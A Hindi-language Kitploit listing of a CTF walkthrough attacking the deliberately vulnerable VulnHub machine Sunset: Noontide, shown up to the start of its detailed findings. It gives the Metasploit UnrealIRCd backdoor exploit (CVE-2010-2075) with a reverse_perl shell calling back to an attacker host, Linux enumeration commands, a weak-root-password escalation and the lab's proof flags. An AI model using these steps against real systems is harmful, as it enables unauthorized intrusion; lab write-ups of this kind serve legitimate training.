Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sunset-noontide-pentesting — विवरण Sunset: Noontide VulnHub मशीन का पेशेवर पेनिट्रेशन टेस्टिंग मूल्यांकन, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, CVE-2010-2075 एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, और पूर्ण सिस्टम कॉम्प्रोमाइज़ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/zales2004/sunset-noontide-pentesting
विशेषाधिकार वृद्धिटोहीपोर्ट स्कैनिंगभेद्यता विश्लेषणशोषणपोस्ट-शोषणनेटवर्क सुरक्षाCTFपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
रेड टीमिंग
लैब और अभ्यास
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

विवरण Sunset: Noontide VulnHub मशीन का पेशेवर पेनिट्रेशन टेस्टिंग मूल्यांकन, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, CVE-2010-2075 एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, और पूर्ण सिस्टम कॉम्प्रोमाइज़ शामिल हैं।

रिपॉजिटरी देखें
2120 दिन पहलेअभी तक समीक्षित नहीं

Sunset: Noontide — पेनेट्रेशन टेस्टिंग

Sunset: Noontide का एक पेशेवर पेनेट्रेशन टेस्टिंग मूल्यांकन और CTF वॉकथ्रू, जो VulnHub की एक जानबूझकर कमजोर बनाई गई मशीन है।

यह प्रोजेक्ट पूर्ण पेनेट्रेशन टेस्टिंग जीवनचक्र का दस्तावेजीकरण करता है, जिसमें रेकॉनिसेंस, सर्विस एन्यूमरेशन, वल्नरेबिलिटी रिसर्च, एक्सप्लॉइटेशन, प्रारंभिक एक्सेस, पोस्ट-एक्सप्लॉइटेशन, प्रिविलेज एस्केलेशन, प्रूफ-ऑफ-कॉम्प्रोमाइज़, जोखिम मूल्यांकन, MITRE ATT&CK मैपिंग, और उपचार शामिल हैं।

⚠️ अस्वीकरण: यह मूल्यांकन एक अधिकृत प्रयोगशाला वातावरण में जानबूझकर कमजोर बनाई गई मशीन के विरुद्ध किया गया था। यहाँ प्रलेखित तकनीकें और कमांड केवल उन सिस्टम के लिए हैं जिनके लिए स्पष्ट प्राधिकरण प्राप्त किया गया है।


🎯 उद्देश्य

  • लक्ष्य होस्ट की पहचान करना
  • उजागर सेवाओं की गणना करना
  • कमजोर सॉफ़्टवेयर और संस्करणों की पहचान करना
  • लागू होने वाली कमजोरियों पर शोध करना
  • कमजोर सेवा का शोषण करना
  • प्रारंभिक शेल एक्सेस प्राप्त करना
  • Linux पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन करना
  • प्रिविलेज एस्केलेशन के अवसरों की पहचान करना
  • रूट-स्तरीय एक्सेस प्राप्त करना
  • उपयोगकर्ता और रूट प्रूफ फ़ाइलें पुनर्प्राप्त करना
  • सुरक्षा निष्कर्षों का दस्तावेजीकरण करना
  • उपचार सिफारिशें प्रदान करना

🖥️ लैब वातावरण

घटकविवरण
लक्ष्यSunset: Noontide
प्लेटफ़ॉर्मVulnHub
लक्ष्य IP10.106.186.186
लक्ष्य होस्टनामnoontide
लक्ष्य OSDebian GNU/Linux 10 (Buster)
आर्किटेक्चरx86_64
हमलावर प्लेटफ़ॉर्मKali Linux
हमलावर IP10.106.186.204
मूल्यांकन प्रकारअधिकृत प्रयोगशाला मूल्यांकन
समग्र जोखिमCRITICAL
मूल्यांकन परिणामपूर्ण सिस्टम कॉम्प्रोमाइज़

🔐 अटैक चेन

लक्ष्य खोज → Nmap एन्यूमरेशन → UnrealIRCd 3.2.8.1 की पहचान → SearchSploit → CVE-2010-2075 की पहचान → Metasploit एक्सप्लॉइटेशन → रिमोट कमांड शेल → server के रूप में शेल → Linux पोस्ट-एक्सप्लॉइटेशन → कमजोर रूट क्रेडेंशियल → su root → UID 0 / रूट एक्सेस → उपयोगकर्ता और रूट प्रूफ फ़ाइलें


1. रेकॉनिसेंस

कमजोर लक्ष्य की पहचान करने के लिए प्रारंभिक नेटवर्क डिस्कवरी की गई।

लक्ष्य को अंततः इस रूप में पहचाना गया:

10.106.186.186

रेकॉनिसेंस के दौरान, 10.106.186.142 को इच्छित लक्ष्य के बजाय डिफ़ॉल्ट गेटवे के रूप में पहचाना गया।

यह आगे की सुरक्षा परीक्षण करने से पहले लक्ष्य की सही पहचान करने के महत्व को उजागर करता है, विशेष रूप से ब्रिज्ड या साझा प्रयोगशाला नेटवर्क में।


2. सर्विस एन्यूमरेशन

लक्ष्य के विरुद्ध Nmap सर्विस और संस्करण डिटेक्शन निम्नलिखित का उपयोग करके किया गया:

nmap -sV 10.106.186.186

मूल्यांकन के दौरान पहचानी गई महत्वपूर्ण उजागर सेवा थी:

6667/tcp open irc UnrealIRCd

इसके बाद अधिक विस्तृत स्कैन निम्नलिखित का उपयोग करके किया गया:

nmap -sC -sV -Pn -p 6667 10.106.186.186

सेवा की पहचान इस रूप में की गई:

UnrealIRCd 3.2.8.1

IRC सेवा ने यह भी रिपोर्ट किया:

irc.foonet.com

उजागर UnrealIRCd सेवा मूल्यांकन के दौरान जाँचा गया प्राथमिक अटैक सरफेस बन गई।


3. वल्नरेबिलिटी रिसर्च

खोजे गए UnrealIRCd संस्करण से जुड़ी सार्वजनिक रूप से प्रलेखित कमजोरियों की जाँच के लिए SearchSploit का उपयोग किया गया।

कमांड:

searchsploit UnrealIRCd 3.2.8.1

प्रासंगिक परिणाम था:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

कमजोरी की पहचान इस रूप में की गई:

CVE-2010-2075

कमजोरी

UnrealIRCd 3.2.8.1 बैकडोर कमांड एक्ज़ीक्यूशन

गंभीरता

Critical

हमले का प्रकार

रिमोट कमांड एक्ज़ीक्यूशन

सुरक्षा प्रभाव

कमजोर सेवा का सफल शोषण हमलावर को लक्ष्य सिस्टम पर दूर से कमांड निष्पादित करने की अनुमति देता है।


4. Metasploit एक्सप्लॉइटेशन

कमजोर IRC सेवा का शोषण Metasploit Framework का उपयोग करके किया गया।

चयनित मॉड्यूल था:

exploit/unix/irc/unreal_ircd_3281_backdoor

उदाहरण कॉन्फ़िगरेशन:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

प्रारंभिक पेलोड प्रयासों से कोई उपयोगी सत्र उत्पन्न नहीं हुआ।

इसके बाद एक संगत Unix रिवर्स-Perl पेलोड चुना गया:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit ने रिपोर्ट किया कि लक्ष्य कमजोर प्रतीत होता है और सफलतापूर्वक एक कमांड-शेल सत्र खोला।


5. प्रारंभिक एक्सेस

प्राप्त शेल को निम्नलिखित का उपयोग करके सत्यापित किया गया:

whoami

परिणाम:

server

इसने server खाते के रूप में सफल रिमोट कमांड निष्पादन की पुष्टि की।

प्रारंभिक कार्यशील निर्देशिका थी:

/home/server/irc/Unreal3.2

इस चरण में, मूल्यांकन रिमोट सेवा शोषण से स्थानीय पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन की ओर बढ़ा।


6. पोस्ट-एक्सप्लॉइटेशन एन्यूमरेशन

शेल प्राप्त करने के बाद, कॉम्प्रोमाइज़्ड होस्ट को समझने और संभावित प्रिविलेज एस्केलेशन पथों की पहचान करने के लिए मानक Linux एन्यूमरेशन किया गया।

वर्तमान उपयोगकर्ता

कमांड:

id

परिणाम:

uid=1000(server) gid=1000(server)

खाता एक गैर-रूट उपयोगकर्ता था।

होस्टनाम

कमांड:

hostname

परिणाम:

noontide

कर्नेल जानकारी

कमांड:

uname -a

परिणाम:

Linux noontide 4.19.0-10-amd64 x86_64

ऑपरेटिंग सिस्टम

कमांड:

cat /etc/os-release

परिणाम:

Debian GNU/Linux 10 (buster)

इन कमांडों ने वर्तमान पहचान, होस्टनाम, कर्नेल संस्करण, ऑपरेटिंग सिस्टम, और सामान्य सिस्टम कॉन्फ़िगरेशन को स्थापित किया।


7. प्रिविलेज एस्केलेशन एन्यूमरेशन

कई मानक Linux प्रिविलेज एस्केलेशन जाँचें की गईं।

7.1 SUID एन्यूमरेशन

कमांड:

find / -perm -4000 -type f 2>/dev/null

passwd, chsh, mount, umount, su, chfn, newgrp, और gpasswd जैसे मानक SUID बाइनरी की पहचान की गई।

सफल एस्केलेशन वेक्टर के रूप में कोई स्पष्ट कस्टम या असामान्य SUID बाइनरी की पहचान नहीं की गई।


7.2 Sudo एन्यूमरेशन

कमांड:

sudo -l

उपलब्ध आउटपुट से कोई उपयोगी sudo-आधारित प्रिविलेज एस्केलेशन पथ की पहचान नहीं की गई।


7.3 Cron एन्यूमरेशन

कमांड:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

देखे गए शेड्यूल किए गए जॉब मानक Debian-शैली के सिस्टम जॉब थे।

कोई स्पष्ट रूप से लिखने योग्य रूट cron जॉब की पहचान नहीं की गई।


7.4 राइटेबल फ़ाइल एन्यूमरेशन

कमांड:

find / -writable -type f 2>/dev/null | head -100

प्रारंभिक परिणाम मुख्य रूप से /proc स्यूडो-फ़ाइलें थीं और किसी व्यावहारिक प्रिविलेज एस्केलेशन वेक्टर का खुलासा नहीं किया।


7.5 Linux क्षमताएँ

कमांड:

getcap -r / 2>/dev/null

परिणामी आउटपुट से कोई उपयोगी क्षमता-आधारित प्रिविलेज एस्केलेशन की पहचान नहीं की गई।


8. प्रिविलेज एस्केलेशन

सफल प्रिविलेज एस्केलेशन पथ कमजोर मशीन पर कॉन्फ़िगर किए गए जानबूझकर कमजोर रूट क्रेडेंशियल पर आधारित था।

रूट खाते का उपयोग निम्नलिखित का उपयोग करके किया गया:

su root

पासवर्ड:

root

इसके बाद रूट एक्सेस को निम्नलिखित का उपयोग करके सत्यापित किया गया:

id

परिणाम:

uid=0(root) gid=0(root) groups=0(root)

पहचान की पुष्टि निम्नलिखित का उपयोग करके भी की गई:

whoami

परिणाम:

root

इसने लक्ष्य सिस्टम के पूर्ण प्रशासनिक नियंत्रण की पुष्टि की।


9. प्रूफ ऑफ कॉम्प्रोमाइज़

9.1 उपयोगकर्ता-स्तरीय प्रूफ

उपयोगकर्ता-स्तरीय प्रूफ फ़ाइल यहाँ स्थित थी:

/home/server/local.txt

कमांड:

cat /home/server/local.txt

परिणाम:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 रूट-स्तरीय प्रूफ

रूट-स्तरीय प्रूफ फ़ाइल यहाँ स्थित थी:

/root/proof.txt

कमांड:

cat /root/proof.txt

परिणाम:

ab28c8ca8da1b9ffc2d702ac54221105

रूट प्रूफ ने यह भी लौटाया:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

दोनों प्रूफ फ़ाइलों की पुनर्प्राप्ति प्रारंभिक रिमोट एक्सेस से रूट-स्तरीय नियंत्रण तक सफल कॉम्प्रोमाइज़ की पुष्टि करती है।


10. जोखिम सारांश

IDनिष्कर्षगंभीरताप्रभाव
VULN-01UnrealIRCd 3.2.8.1 बैकडोर🔴 Criticalरिमोट कमांड एक्ज़ीक्यूशन
VULN-02कमजोर रूट क्रेडेंशियल🔴 Criticalपूर्ण प्रशासनिक कॉम्प्रोमाइज़

11. विस्तृत निष्कर्ष

VULN-01 — UnrealIRCd 3.2.8.1 बैकडोर

गंभीरता: Critical

प्रभावित सेवा: IRC / TCP 6667

प्रभावित सॉफ़्टवेयर: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

हमले का प्रकार: रिमोट कमांड एक्ज़ीक्यूशन

देखा गया प्रभाव: server के रूप में रिमोट शेल प्राप्त

विवरण

उजागर UnrealIRCd सेवा एक ज्ञात बैकडोर कमांड-एक्ज़ीक्यूशन कमजोरी से जुड़ा एक कमजोर संस्करण चला रही थी।

टूल डाउनलोड करें